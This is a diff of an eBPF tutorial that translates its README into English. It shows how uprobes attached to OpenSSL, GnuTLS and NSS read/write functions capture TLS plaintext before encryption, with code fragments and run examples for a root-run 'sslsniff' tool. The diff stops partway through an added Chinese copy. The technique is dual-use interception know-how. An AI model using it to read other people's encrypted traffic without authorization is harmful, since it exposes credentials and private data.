-但现在,我们有了新的解决方案。使用 eBPF 技术,通过其能力在用户空间进行探测,提供了一种方法重新获得明文数据,使得我们可以直观地查看加密前的通信内容。然而,每个应用可能使用不同的库,每个库都有多个版本,这种多样性给跟踪带来了复杂性。
+However, a new solution is now available. Through the use of eBPF technology and its capability to perform probing in user space, a method has emerged to regain plain text data, allowing us to intuitively view the pre-encrypted communication content. Nevertheless, each application might utilize different libraries, and each library comes in multiple versions, introducing complexity to the tracing process.

-在本教程中,我们将带您了解一种跨多种用户态 SSL/TLS 库的 eBPF 追踪技术,它不仅可以同时跟踪 GnuTLS 和 OpenSSL 等用户态库,而且相比以往,大大降低了对新版本库的维护工作。完整的源代码可以在这里查看:。
+In this tutorial, we will guide you through an eBPF tracing technique that spans across various user-space SSL/TLS libraries. This technique not only allows simultaneous tracing of user-space libraries like GnuTLS and OpenSSL but also significantly reduces maintenance efforts for new library versions compared to previous methods. The complete code for this tutorial can be found at [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/30-sslsniff](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/30-sslsniff).

-## 背景知识
+## Background Knowledge

-在深入本教程的主题之前,我们需要理解一些核心概念,这些概念将为我们后面的讨论提供基础。
+Before delving into the main topic of this tutorial, we need to grasp some core concepts that will serve as the foundation for our subsequent discussions.

-### SSL 和 TLS
+### SSL and TLS

-SSL (Secure Sockets Layer): 由 Netscape 在 1990 年代早期开发,为网络上的两台机器之间提供数据加密传输。然而,由于某些已知的安全问题,SSL的使用已被其后继者TLS所替代。
+SSL (Secure Sockets Layer): Developed by Netscape in the early 1990s, SSL provides data encryption for communication between two machines on a network. However, due to known security vulnerabilities, SSL has been succeeded by its successor, TLS.

-TLS (Transport Layer Security): 是 SSL 的继任者,旨在提供更强大和更安全的数据加密方式。TLS 工作通过一个握手过程,在这个过程中,客户端和服务器之间会选择一个加密算法和相应的密钥。一旦握手完成,数据传输开始,所有数据都使用选择的算法和密钥加密。
+TLS (Transport Layer Security): TLS is the successor to SSL, aiming to provide stronger and more secure data encryption methods. TLS operates through a handshake process during which a client and a server select an encryption algorithm and corresponding keys. Once the handshake is complete, data transmission begins, with all data being encrypted using the chosen algorithm and keys.

-### TLS 的工作原理
+### Operation Principles of TLS

-Transport Layer Security (TLS) 是一个密码学协议,旨在为计算机网络上的通信提供安全性。它主要目标是通过密码学,例如证书的使用,为两个或更多通信的计算机应用程序提供安全性,包括隐私(机密性)、完整性和真实性。TLS 由两个子层组成:TLS 记录协议和TLS 握手协议。
+Transport Layer Security (TLS) is a cryptographic protocol designed to provide security for communication over computer networks. Its primary goal is to use cryptography, such as certificates, to provide privacy (confidentiality), integrity, and authenticity for two or more communicating computer applications.
TLS consists of two sub-layers: the TLS Record Protocol and the TLS Handshake Protocol. -#### 握手过程 +#### Handshake Process -当客户端与启用了TLS的服务器连接并请求建立安全连接时,握手过程开始。握手允许客户端和服务器通过不对称密码来建立连接的安全性参数,完整流程如下: +When a client connects to a TLS-enabled server and requests a secure connection, the handshake process begins. The handshake allows the client and server to establish security parameters for the connection using asymmetric cryptography. The complete process is as follows: -1. **初始握手**:客户端连接到启用了TLS的服务器,请求安全连接,并提供它支持的密码套件列表(加密算法和哈希函数)。 -2. **选择密码套件**:从提供的列表中,服务器选择它也支持的密码套件和哈希函数,并通知客户端已做出的决定。 -3. **提供数字证书**:通常,服务器接下来会提供形式为数字证书的身份验证。此证书包含服务器名称、信任的证书授权机构(为证书的真实性提供担保)以及服务器的公共加密密钥。 -4. **验证证书**:客户端在继续之前确认证书的有效性。 -5. **生成会话密钥**:为了生成用于安全连接的会话密钥,客户端有以下两种方法: - - 使用服务器的公钥加密一个随机数(PreMasterSecret)并将结果发送到服务器(只有服务器才能使用其私钥解密);双方然后使用该随机数生成一个独特的会话密钥,用于会话期间的数据加密和解密。 - - 使用 Diffie-Hellman 密钥交换(或其变体椭圆曲线DH)来安全地生成一个随机且独特的会话密钥,用于加密和解密,该密钥具有前向保密的额外属性:即使在未来公开了服务器的私钥,也不能用它来解密当前的会话,即使第三方拦截并记录了会话。 +1. **Initial Handshake**: The client connects to the TLS-enabled server, requests a secure connection, and provides a list of supported cipher suites (encryption algorithms and hash functions). +2. **Selecting Cipher Suite**: From the provided list, the server chooses a cipher suite and hash function it also supports and notifies the client of the decision. +3. **Providing Digital Certificate**: Usually, the server then provides identity authentication in the form of a digital certificate. This certificate includes the server's name, trusted certificate authorities (guaranteeing the certificate's authenticity), and the server's public encryption key. +4. **Certificate Verification**: The client verifies the certificate's validity before proceeding. +5. **Generating Session Key**: To create a session key for a secure connection, the client has two methods: + - Encrypt a random number (PreMasterSecret) with the server's public key and send the result to the server (only the server can decrypt it with its private key); both parties then use this random number to generate a unique session key for encrypting and decrypting data during the session. + - Use Diffie-Hellman key exchange (or its variant, Elliptic Curve DH) to securely generate a random and unique session key for encryption and decryption. This key has the additional property of forward secrecy: even if the server's private key is exposed in the future, it can't be used to decrypt the current session, even if a third party intercepts and records the session. -一旦上述步骤成功完成,握手过程便结束,加密的连接开始。此连接使用会话密钥进行加密和解密,直到连接关闭。如果上述任何步骤失败,则TLS握手失败,连接将不会建立。 +Once these steps are successfully completed, the handshake process concludes, and the encrypted connection begins. This connection uses the session key for encryption and decryption until the connection is closed. If any of the above steps fail, the TLS handshake fails, and the connection won't be established. -#### OSI模型中的TLS +#### TLS in the OSI Model -TLS 和 SSL 不完全适合 OSI 模型或 TCP/IP 模型的任何单一层次。TLS 在“某些可靠的传输协议(例如,TCP)之上运行”,这意味着它位于传输层之上。它为更高的层提供加密,这通常是表示层的功能。但是,使用TLS 的应用程序通常视其为传输层,即使使用TLS的应用程序必须积极控制启动 TLS 握手和交换的认证证书的处理。 +TLS and SSL don't perfectly align with any single layer of the OSI model or the TCP/IP model. TLS "runs over some reliable transport protocol (such as TCP)," which means it sits above the transport layer. It provides encryption for higher layers, typically the presentation layer. 
However, applications using TLS often treat it as the transport layer, even though they must actively control the initiation of TLS handshakes and the handling of exchanged authentication certificates.

-### eBPF 和 uprobe
+### eBPF and uprobes

-eBPF (Extended Berkeley Packet Filter): 是一种内核技术,允许用户在内核空间中运行预定义的程序,不需要修改内核源代码或重新加载模块。它创建了一个桥梁,使得用户空间和内核空间可以交互,从而为系统监控、性能分析和网络流量分析等任务提供了无前例的能力。
+eBPF (Extended Berkeley Packet Filter): It's a kernel technology that allows users to run predefined programs in the kernel space without modifying kernel source code or reloading modules. It creates a bridge that enables interaction between user space and kernel space, providing unprecedented capabilities for tasks like system monitoring, performance analysis, and network traffic analysis.

-uprobes 是eBPF的一个重要特性,允许我们在用户空间应用程序中动态地插入探测点,特别适用于跟踪SSL/TLS库中的函数调用。Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。
+uprobes are a significant feature of eBPF, allowing dynamic insertion of probe points in user-space applications, and they are particularly useful for tracing function calls in SSL/TLS libraries. Running uprobes in the kernel-mode eBPF runtime can also incur a relatively large performance overhead; in that case, you can consider a user-mode eBPF runtime such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user-mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user space, is compatible with kernel-mode eBPF, and avoids context switches between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs. For uprobes, the performance overhead of bpftime is an order of magnitude smaller than that of the kernel runtime.

-### 用户态库
+### User-Space Libraries

-SSL/TLS协议的实现主要依赖于用户态库。以下是一些常见的库:
+The implementation of the SSL/TLS protocol relies heavily on user-space libraries. Here are some common ones:

-- OpenSSL: 一个开源的、功能齐全的加密库,广泛应用于许多开源和商业项目中。
-- BoringSSL: 是Google维护的OpenSSL的一个分支,重点是简化和优化,适用于Google的需求。
-- GnuTLS: 是GNU项目的一部分,提供了SSL,TLS和DTLS协议的实现。与OpenSSL和BoringSSL相比,GnuTLS在API设计、模块结构和许可证上有所不同。
+- OpenSSL: An open-source, feature-rich cryptographic library widely used in many open-source and commercial projects.
+- BoringSSL: A fork of OpenSSL maintained by Google, focusing on simplification and optimization for Google's needs.
+- GnuTLS: Part of the GNU project, offering an implementation of SSL, TLS, and DTLS protocols. GnuTLS differs from OpenSSL and BoringSSL in API design, module structure, and licensing.

-## OpenSSL API 分析
+## OpenSSL API Analysis

-OpenSSL 是一个广泛应用的开源库,提供了 SSL 和 TLS 协议的完整实现,并广泛用于各种应用程序中以确保数据传输的安全性。其中,SSL_read() 和 SSL_write() 是两个核心的 API 函数,用于从 TLS/SSL 连接中读取和写入数据。本章节,我们将深入这两个函数,帮助你理解其工作机制。
+OpenSSL is a widely used open-source library providing a complete implementation of the SSL and TLS protocols, ensuring data transmission security in various applications. Among its functions, SSL_read() and SSL_write() are two core API functions for reading from and writing to TLS/SSL connections. In this section, we'll delve into these functions to help you understand their mechanisms.

-### 1. SSL_read 函数
+### 1. SSL_read Function

-当我们想从一个已建立的 SSL 连接中读取数据时,可以使用 `SSL_read` 或 `SSL_read_ex` 函数。函数原型如下:
+When we want to read data from an established SSL connection, we can use the `SSL_read` or `SSL_read_ex` function.
The function prototype is as follows: ```c int SSL_read_ex(SSL *ssl, void *buf, size_t num, size_t *readbytes); int SSL_read(SSL *ssl, void *buf, int num); ``` -`SSL_read` 和 `SSL_read_ex` 试图从指定的 `ssl` 中读取最多 `num` 字节的数据到缓冲区 `buf` 中。成功时,`SSL_read_ex` 会在 `*readbytes` 中存储实际读取到的字节数。 +`SSL_read` and `SSL_read_ex` attempt to read up to `num` bytes of data from the specified `ssl` into the buffer `buf`. Upon success, `SSL_read_ex` stores the actual number of read bytes in `*readbytes`. -### 2. SSL_write 函数 +### 2. Function SSL_write -当我们想往一个已建立的 SSL 连接中写入数据时,可以使用 `SSL_write` 或 `SSL_write_ex` 函数。 +When we want to write data into an established SSL connection, we can use the `SSL_write` or `SSL_write_ex` functions. -函数原型: +Function prototype: ```c int SSL_write_ex(SSL *s, const void *buf, size_t num, size_t *written); int SSL_write(SSL *ssl, const void *buf, int num); ``` -`SSL_write` 和 `SSL_write_ex` 会从缓冲区 `buf` 中将最多 `num` 字节的数据写入到指定的 `ssl` 连接中。成功时,`SSL_write_ex` 会在 `*written` 中存储实际写入的字节数。 +`SSL_write` and `SSL_write_ex` will write up to `num` bytes of data from the buffer `buf` into the specified `ssl` connection. Upon success, `SSL_write_ex` will store the actual number of written bytes in `*written`. -## eBPF 内核态代码编写 +## Writing eBPF Kernel Code -在我们的例子中,我们使用 eBPF 来 hook ssl_read 和 ssl_write 函数,从而在数据读取或写入 SSL 连接时执行自定义操作。 +In our example, we use eBPF to hook the `ssl_read` and `ssl_write` functions to perform custom actions when data is read from or written to an SSL connection. -### 数据结构 +### Data Structures -首先,我们定义了一个数据结构 probe_SSL_data_t 用于在内核态和用户态之间传输数据: +Firstly, we define a data structure `probe_SSL_data_t` to transfer data between kernel and user space: ```c #define MAX_BUF_SIZE 8192 #define TASK_COMM_LEN 16 struct probe_SSL_data_t { - __u64 timestamp_ns; // 时间戳(纳秒) - __u64 delta_ns; // 函数执行时间 - __u32 pid; // 进程 ID - __u32 tid; // 线程 ID - __u32 uid; // 用户 ID - __u32 len; // 读/写数据的长度 - int buf_filled; // 缓冲区是否填充完整 - int rw; // 读或写(0为读,1为写) - char comm[TASK_COMM_LEN]; // 进程名 - __u8 buf[MAX_BUF_SIZE]; // 数据缓冲区 - int is_handshake; // 是否是握手数据 + __u64 timestamp_ns; // Timestamp (nanoseconds) + __u64 delta_ns; // Function execution time + __u32 pid; // Process ID + __u32 tid; // Thread ID + __u32 uid; // User ID + __u32 len; // Length of read/write data + int buf_filled; // Whether buffer is filled completely + int rw; // Read or Write (0 for read, 1 for write) + char comm[TASK_COMM_LEN]; // Process name + __u8 buf[MAX_BUF_SIZE]; // Data buffer + int is_handshake; // Whether it's handshake data }; ``` -### Hook 函数 +### Hook Functions -我们的目标是 hook 到 `SSL_read` 和 `SSL_write` 函数。我们定义了一个函数 `SSL_exit` 来处理这两个函数的返回值。该函数会根据当前进程和线程的 ID,确定是否需要追踪并收集数据。 +Our goal is to hook into the `SSL_read` and `SSL_write` functions. We define a function `SSL_exit` to handle the return values of these two functions. This function determines whether to trace and collect data based on the current process and thread IDs. ```c static int SSL_exit(struct pt_regs *ctx, int rw) { @@ -173,39 +173,39 @@ static int SSL_exit(struct pt_regs *ctx, int rw) { } ``` -这里的 `rw` 参数标识是读还是写。0 代表读,1 代表写。 +The `rw` parameter here indicates whether it's a read or write operation. 0 represents read, and 1 represents write. -#### 数据收集流程 +#### Data Collection Process -1. 获取当前进程和线程的 ID,以及当前用户的 ID。 -2. 通过 `trace_allowed` 判断是否允许追踪该进程。 -3. 获取起始时间,以计算函数的执行时间。 -4. 尝试从 `bufs` 和 `start_ns` maps 中查找相关的数据。 -5. 如果成功读取了数据,则创建或查找 `probe_SSL_data_t` 结构来填充数据。 -6. 将数据从用户空间复制到缓冲区,并确保不超过预定的大小。 -7. 最后,将数据发送到用户空间。 +1. 
Obtain the ID of the current process and thread, along with the ID of the current user. +2. Use `trace_allowed` to determine if tracing is allowed for this process. +3. Get the start time to calculate the execution time of the function. +4. Attempt to retrieve relevant data from the `bufs` and `start_ns` maps. +5. If data retrieval is successful, create or locate a `probe_SSL_data_t` structure to populate the data. +6. Copy the data from user space to the buffer, ensuring it doesn't exceed the designated size. +7. Finally, send the data to user space. -注意:我们使用了两个用户返回探针 `uretprobe` 来分别 hook `SSL_read` 和 `SSL_write` 的返回: +Note: We use two user-level return probes `uretprobe` to respectively hook the returns of `SSL_read` and `SSL_write`: ```c SEC("uretprobe/SSL_read") int BPF_URETPROBE(probe_SSL_read_exit) { - return (SSL_exit(ctx, 0)); // 0 表示读操作 + return (SSL_exit(ctx, 0)); // 0 indicates read operation } SEC("uretprobe/SSL_write") int BPF_URETPROBE(probe_SSL_write_exit) { - return (SSL_exit(ctx, 1)); // 1 表示写操作 + return (SSL_exit(ctx, 1)); // 1 indicates write operation } ``` -### Hook到握手过程 +### Hooking into the Handshake Process -在 SSL/TLS 中,握手(handshake)是一个特殊的过程,用于在客户端和服务器之间建立安全的连接。为了分析此过程,我们 hook 到了 `do_handshake` 函数,以跟踪握手的开始和结束。 +In SSL/TLS, the handshake is a special process used to establish a secure connection between a client and a server. To analyze this process, we hook into the `do_handshake` function to track the start and end of the handshake. -#### 进入握手 +#### Entering the Handshake -我们使用 `uprobe` 为 `do_handshake` 设置一个 probe: +We use a `uprobe` to set a probe for the `do_handshake` function: ```c @@ -227,15 +227,25 @@ int BPF_UPROBE(probe_SSL_do_handshake_enter, void *ssl) { } ``` -这段代码的主要功能如下: +The main functionality of this code is as follows: -1. 获取当前的 `pid`, `tid`, `ts` 和 `uid`。 -2. 使用 `trace_allowed` 检查进程是否被允许追踪。 -3. 将当前时间戳存储在 `start_ns` 映射中,用于稍后计算握手过程的持续时间。 +1. Obtain the current `pid`, `tid`, `ts`, and `uid`. +2. Use `trace_allowed` to verify if the process is allowed to be traced. +3. Store the current timestamp in the `start_ns` map, which will be used to calculate the duration of the handshake process later. -#### 退出握手 +#### Exiting the Handshake -同样,我们为 `do_handshake` 的返回设置了一个 `uretprobe`: +Similarly, we've set a `uretprobe` for the return of `do_handshake`: + +```c +SEC("uretprobe/do_handshake") +int BPF_URETPROBE(handle_do_handshake_exit) { + // Code to execute upon exiting the do_handshake function. + return 0; +} +``` + +In this context, the `uretprobe` will execute the provided code when the `do_handshake` function exits. ```c @@ -287,29 +297,29 @@ int BPF_URETPROBE(probe_SSL_do_handshake_exit) { } ``` -此函数的逻辑如下: +Logic of this Function: -1. 获取当前的 `pid`, `tid`, `ts` 和 `uid`。 -2. 使用 `trace_allowed` 再次检查是否允许追踪。 -3. 查找 `start_ns` 映射中的时间戳,用于计算握手的持续时间。 -4. 使用 `PT_REGS_RC(ctx)` 获取 `do_handshake` 的返回值,判断握手是否成功。 -5. 查找或初始化与当前线程关联的 `probe_SSL_data_t` 数据结构。 -6. 更新数据结构的字段,包括时间戳、持续时间、进程信息等。 -7. 通过 `bpf_perf_event_output` 将数据发送到用户态。 +1. Obtain the current `pid`, `tid`, `ts`, and `uid`. +2. Use `trace_allowed` to recheck if tracing is allowed. +3. Look up the timestamp in the `start_ns` map for calculating handshake duration. +4. Use `PT_REGS_RC(ctx)` to get the return value of `do_handshake` and determine if the handshake was successful. +5. Find or initialize the `probe_SSL_data_t` data structure associated with the current thread. +6. Update the data structure's fields, including timestamp, duration, process information, etc. +7. 
Use `bpf_perf_event_output` to send the data to user space. -我们的 eBPF 代码不仅跟踪了 `ssl_read` 和 `ssl_write` 的数据传输,还特别关注了 SSL/TLS 的握手过程。这些信息对于深入了解和优化安全连接的性能至关重要。 +Our eBPF code not only tracks data transmission for `ssl_read` and `ssl_write` but also focuses on the SSL/TLS handshake process. This information is crucial for a deeper understanding and optimization of the performance of secure connections. -通过这些 hook 函数,我们可以获得关于握手成功与否、握手所需的时间以及相关的进程信息的数据。这为我们提供了关于系统 SSL/TLS 行为的深入见解,可以帮助我们在需要时进行更深入的分析和优化。 +Through these hook functions, we can obtain data regarding the success of the handshake, the time taken for the handshake, and related process information. This provides us with insights into the behavior of the system's SSL/TLS, enabling us to perform more in-depth analysis and optimization when necessary. -## 用户态辅助代码分析与解读 +## User-Space Assisted Code Analysis and Interpretation -在 eBPF 的生态系统中,用户态和内核态代码经常协同工作。内核态代码负责数据的采集,而用户态代码则负责设置、管理和处理这些数据。在本节中,我们将解读上述用户态代码如何配合 eBPF 追踪 SSL/TLS 交互。 +In the eBPF ecosystem, user-space and kernel-space code often work in collaboration. Kernel-space code is responsible for data collection, while user-space code manages, processes, and handles this data. In this section, we will explain how the above user-space code collaborates with eBPF to trace SSL/TLS interactions. -### 1. 支持的库挂载 +### 1. Supported Library Attachment -上述代码片段中,根据环境变量 `env` 的设定,程序可以选择针对三种常见的加密库(OpenSSL、GnuTLS 和 NSS)进行挂载。这意味着我们可以在同一个工具中对多种库的调用进行追踪。 +In the provided code snippet, based on the setting of the `env` environment variable, the program can choose to attach to three common encryption libraries (OpenSSL, GnuTLS, and NSS). This means that we can trace calls to multiple libraries within the same tool. -为了实现这一功能,首先利用 `find_library_path` 函数确定库的路径。然后,根据库的类型,调用对应的 `attach_` 函数来将 eBPF 程序挂载到库函数上。 +To achieve this functionality, the `find_library_path` function is first used to determine the library's path. Then, depending on the library type, the corresponding `attach_` function is called to attach the eBPF program to the library function. ```c if (env.openssl) { @@ -329,11 +339,11 @@ int BPF_URETPROBE(probe_SSL_do_handshake_exit) { } ``` -这里主要包含 OpenSSL、GnuTLS 和 NSS 三个库的挂载逻辑。NSS 是为组织设计的一套安全库,支持创建安全的客户端和服务器应用程序。它们最初是由 Netscape 开发的,现在由 Mozilla 维护。其他两个库前面已经介绍过了,这里不再赘述。 +This section primarily covers the attachment logic for the OpenSSL, GnuTLS, and NSS libraries. NSS is a set of security libraries designed for organizations, supporting the creation of secure client and server applications. Originally developed by Netscape, they are now maintained by Mozilla. The other two libraries have been introduced earlier and are not reiterated here. -### 2. 详细挂载逻辑 +### 2. Detailed Attachment Logic -具体的 attach 函数如下: +The specific `attach` functions are as follows: ```c #define __ATTACH_UPROBE(skel, binary_path, sym_name, prog_name, is_retprobe) \ @@ -383,26 +393,26 @@ int attach_nss(struct sslsniff_bpf *skel, const char *lib) { } ``` -我们进一步观察 `attach_` 函数,可以看到它们都使用了 `ATTACH_UPROBE_CHECKED` 和 `ATTACH_URETPROBE_CHECKED` 宏来实现具体的挂载逻辑。这两个宏分别用于设置 uprobe(函数入口)和 uretprobe(函数返回)。 +We further examine the `attach_` function and can see that they both use the `ATTACH_UPROBE_CHECKED` and `ATTACH_URETPROBE_CHECKED` macros to implement specific mounting logic. These two macros are used respectively for setting uprobe (function entry) and uretprobe (function return). 
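+
+To make this concrete, here is a rough, illustrative sketch (not the exact sslsniff code) of what a single `ATTACH_URETPROBE_CHECKED` expansion boils down to, assuming a recent libbpf that supports attaching by symbol name via `bpf_program__attach_uprobe_opts`. The function and variable names other than `sslsniff_bpf` and `probe_SSL_write_exit` are assumptions for this sketch:
+
+```c
+#include <stdio.h>
+#include <bpf/libbpf.h>
+#include "sslsniff.skel.h" /* skeleton header generated by bpftool; name assumed */
+
+/* Attach one uretprobe by symbol name inside the target library. */
+static int attach_ssl_write_exit(struct sslsniff_bpf *skel, const char *lib_path)
+{
+    LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts,
+                .func_name = "SSL_write", /* symbol resolved inside lib_path */
+                .retprobe = true);        /* fire on function return */
+
+    struct bpf_link *link = bpf_program__attach_uprobe_opts(
+            skel->progs.probe_SSL_write_exit,
+            -1,        /* -1 = trace all processes */
+            lib_path,  /* e.g. the libssl path located by find_library_path() */
+            0,         /* offset 0: resolve by func_name instead of raw offset */
+            &uprobe_opts);
+    if (!link) {
+        fprintf(stderr, "failed to attach uretprobe to SSL_write\n");
+        return -1;
+    }
+    return 0;
+}
+```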
-考虑到不同的库有不同的 API 函数名称(例如,OpenSSL 使用 `SSL_write`,而 GnuTLS 使用 `gnutls_record_send`),所以我们需要为每个库写一个独立的 `attach_` 函数。 +Considering that different libraries have different API function names (for example, OpenSSL uses `SSL_write`, while GnuTLS uses `gnutls_record_send`), we need to write a separate `attach_` function for each library. -例如,在 `attach_openssl` 函数中,我们为 `SSL_write` 和 `SSL_read` 设置了 probe。如果用户还希望追踪握手的延迟 (`env.latency`) 和握手过程 (`env.handshake`),那么我们还会为 `SSL_do_handshake` 设置 probe。 +For instance, in the `attach_openssl` function, we set up probes for both `SSL_write` and `SSL_read`. If users also want to track handshake latency (`env.latency`) and the handshake process (`env.handshake`), we set up a probe for `SSL_do_handshake`. -在eBPF生态系统中,perf_buffer是一个用于从内核态传输数据到用户态的高效机制。这对于内核态eBPF程序来说是十分有用的,因为它们不能直接与用户态进行交互。使用perf_buffer,我们可以在内核态eBPF程序中收集数据,然后在用户态异步地读取这些数据。我们使用 `perf_buffer__poll` 函数来读取内核态上报的数据,如下所示: +In the eBPF ecosystem, `perf_buffer` is an efficient mechanism used to transfer data from kernel space to user space. This is particularly useful for kernel-space eBPF programs as they can't directly interact with user space. With `perf_buffer`, we can collect data in kernel-space eBPF programs and then asynchronously read this data in user space. We use the `perf_buffer__poll` function to read data reported in kernel space, as shown below: ```c - while (!exiting) { - err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); - if (err < 0 && err != -EINTR) { - warn("error polling perf buffer: %s\n", strerror(-err)); - goto cleanup; - } - err = 0; +while (!exiting) { + err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); + if (err < 0 && err != -EINTR) { + warn("error polling perf buffer: %s\n", strerror(-err)); + goto cleanup; } + err = 0; +} ``` -最后,在 print_event 函数中,我们将数据打印到标准输出: +Finally, in the `print_event` function, we print the data to standard output: ```c // Function to print the event from the perf buffer @@ -426,37 +436,35 @@ void print_event(struct probe_SSL_data_t *event, const char *evt) { } ``` -完整的源代码可以在这里查看: +You can find the complete source code here: [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/30-sslsniff](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/30-sslsniff) -## 编译与运行 +## Compilation and Execution -关于如何安装依赖,请参考: - -要开始使用 `sslsniff`,首先要进行编译: +To start using `sslsniff`, you need to first compile it: ```sh make ``` -完成后,请按照以下步骤操作: +Once done, follow these steps: -### **启动 sslsniff** +### **Start sslsniff** -在一个终端中,执行以下命令来启动 `sslsniff`: +In a terminal, execute the following command to start `sslsniff`: ```sh sudo ./sslsniff ``` -### **执行 CURL 命令** +### **Execute CURL command** -在另一个终端中,执行: +In another terminal, execute: ```console curl https://example.com ``` -正常情况下,你会看到类似以下的输出: +Under normal circumstances, you will see output similar to the following: ```html @@ -472,9 +480,9 @@ curl https://example.com ``` -### **sslsniff 输出** +### **sslsniff Output** -当执行 `curl` 命令后,`sslsniff` 会显示以下内容: +After executing the `curl` command, `sslsniff` will display the following content: ```txt READ/RECV 0.132786160 curl 47458 1256 @@ -491,11 +499,11 @@ curl https://example.com ----- END DATA ----- ``` -**注意**:显示的 HTML 内容可能会因 `example.com` 页面的不同而有所不同。 +**Note**: The displayed HTML content may vary depending on the specific content of the `example.com` page. 
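+
+A practical note when pointing `sslsniff` at other programs: the probes only fire for the library the target actually links against. A quick way to check is to inspect the target's dynamic dependencies, for example as below (output varies by system; on many distributions wget links against GnuTLS, making it a convenient target for exercising the GnuTLS probes):
+
+```sh
+# See which of the supported TLS libraries a binary pulls in
+ldd "$(which curl)" | grep -Ei 'ssl|gnutls|nss'
+ldd "$(which wget)" | grep -Ei 'ssl|gnutls|nss'
+```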
-### 显示延迟和握手过程 +### Displaying Latency and Handshake Process -要查看延迟和握手过程,请执行以下命令: +To view latency and handshake process, execute the following command: ```console $ sudo ./sslsniff -l --handshake @@ -506,9 +514,9 @@ FUNC TIME(s) COMM PID LEN LAT(ms) HANDSHAKE 0.000000000 curl 6460 1 1.384 WRITE/SEND 0.000115400 curl 6460 24 0.014 ``` -### 16进制输出 +### Hexadecimal Output -要以16进制格式显示数据,请执行以下命令: +To display data in hexadecimal format, execute the following command: ```console $ sudo ./sslsniff --hexdump @@ -521,14 +529,16 @@ WRITE/SEND 0.000000000 curl 16104 24 ... ``` -## 总结 +## Summary -eBPF 是一个非常强大的技术,它可以帮助我们深入了解系统的工作原理。本教程是一个简单的示例,展示了如何使用 eBPF 来监控 SSL/TLS 通信。如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 +eBPF is a very powerful technology that can help us gain deeper insights into how a system works. This tutorial is a simple example demonstrating how to use eBPF to monitor SSL/TLS communication. If you're interested in eBPF technology and want to learn more and practice further, you can visit our tutorial code repository at and tutorial website at . -参考资料: +References: - - - - - + +> The original link of this article: diff --git a/src/30-sslsniff/README.zh.md b/src/30-sslsniff/README.zh.md new file mode 100644 index 0000000..aea36bb --- /dev/null +++ b/src/30-sslsniff/README.zh.md @@ -0,0 +1,534 @@ +# eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据 + +随着TLS在现代网络环境中的广泛应用,跟踪微服务RPC消息已经变得愈加棘手。传统的流量嗅探技术常常受限于只能获取到加密后的数据,导致无法真正观察到通信的原始内容。这种限制为系统的调试和分析带来了不小的障碍。 + +但现在,我们有了新的解决方案。使用 eBPF 技术,通过其能力在用户空间进行探测,提供了一种方法重新获得明文数据,使得我们可以直观地查看加密前的通信内容。然而,每个应用可能使用不同的库,每个库都有多个版本,这种多样性给跟踪带来了复杂性。 + +在本教程中,我们将带您了解一种跨多种用户态 SSL/TLS 库的 eBPF 追踪技术,它不仅可以同时跟踪 GnuTLS 和 OpenSSL 等用户态库,而且相比以往,大大降低了对新版本库的维护工作。完整的源代码可以在这里查看:。 + +## 背景知识 + +在深入本教程的主题之前,我们需要理解一些核心概念,这些概念将为我们后面的讨论提供基础。 + +### SSL 和 TLS + +SSL (Secure Sockets Layer): 由 Netscape 在 1990 年代早期开发,为网络上的两台机器之间提供数据加密传输。然而,由于某些已知的安全问题,SSL的使用已被其后继者TLS所替代。 + +TLS (Transport Layer Security): 是 SSL 的继任者,旨在提供更强大和更安全的数据加密方式。TLS 工作通过一个握手过程,在这个过程中,客户端和服务器之间会选择一个加密算法和相应的密钥。一旦握手完成,数据传输开始,所有数据都使用选择的算法和密钥加密。 + +### TLS 的工作原理 + +Transport Layer Security (TLS) 是一个密码学协议,旨在为计算机网络上的通信提供安全性。它主要目标是通过密码学,例如证书的使用,为两个或更多通信的计算机应用程序提供安全性,包括隐私(机密性)、完整性和真实性。TLS 由两个子层组成:TLS 记录协议和TLS 握手协议。 + +#### 握手过程 + +当客户端与启用了TLS的服务器连接并请求建立安全连接时,握手过程开始。握手允许客户端和服务器通过不对称密码来建立连接的安全性参数,完整流程如下: + +1. **初始握手**:客户端连接到启用了TLS的服务器,请求安全连接,并提供它支持的密码套件列表(加密算法和哈希函数)。 +2. **选择密码套件**:从提供的列表中,服务器选择它也支持的密码套件和哈希函数,并通知客户端已做出的决定。 +3. **提供数字证书**:通常,服务器接下来会提供形式为数字证书的身份验证。此证书包含服务器名称、信任的证书授权机构(为证书的真实性提供担保)以及服务器的公共加密密钥。 +4. **验证证书**:客户端在继续之前确认证书的有效性。 +5. 
